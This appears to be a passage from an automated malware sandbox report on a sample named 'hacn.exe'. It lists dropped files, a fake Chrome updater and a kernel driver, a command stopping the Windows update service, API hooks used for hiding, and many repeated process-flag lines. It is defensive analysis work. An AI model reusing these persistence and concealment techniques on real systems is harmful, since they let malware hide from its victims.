                                  Source: wxyubnjmnlae.tmp.25.drStatic PE information: section name: _TEXT_CN
                                  Source: wxyubnjmnlae.tmp.25.drStatic PE information: section name: _RDATA
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D36506C push rcx; iretd 0_2_00007FF61D36506D
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FF640 push ecx; ret 4_2_000FF653
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FEB78 push eax; ret 4_2_000FEB96
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA3E86 push rdi; ret 5_2_00007FFDF7CA3E92
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D17964 push rax; retf 5_2_00007FFDF7D17965
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA38ED push rdi; ret 5_2_00007FFDF7CA38F4
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CCC941 push r8; ret 5_2_00007FFDF7CCC943
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A4A6F pushad ; retf 5_2_00007FFD9B8A4A91
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8AB442 push ebx; ret 5_2_00007FFD9B8AB44A
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A782E pushad ; iretd 5_2_00007FFD9B8A785D
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8B1715 push ebp; iretd 5_2_00007FFD9B8B1718
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC62ACDD push rcx; retf 003Fh22_2_00000225DC62ACDE
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC65C6DD push rcx; retf 003Fh22_2_00000225DC65C6DE
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC68ACDD push rcx; retf 003Fh22_2_00000225DC68ACDE
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6BC6DD push rcx; retf 003Fh22_2_00000225DC6BC6DE
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0ACACDD push rcx; retf 003Fh26_2_00000202C0ACACDE
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AFC6DD push rcx; retf 003Fh26_2_00000202C0AFC6DE
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612EACDD push rcx; retf 003Fh29_2_000002A6612EACDE
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66131C6DD push rcx; retf 003Fh29_2_000002A66131C6DE
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF00ACDD push rcx; retf 003Fh30_2_000002BAAF00ACDE
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF03C6DD push rcx; retf 003Fh30_2_000002BAAF03C6DE
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879AACDD push rcx; retf 003Fh51_2_0000026A879AACDE

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\gqxqtdeqxchk.sys
                                  Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\python310.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\_socket.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\_bz2.pydJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\gqxqtdeqxchk.sysJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\select.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeFile created: C:\ProgramData\main.exeJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeFile created: C:\ProgramData\main.exeJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\gqxqtdeqxchk.sysJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: C:\ProgramData\setup.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
                                  Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\WXYUBNJMNLAE.TMP
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                                  Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                                  Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D326F00 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF61D326F00
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\ProgramData\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
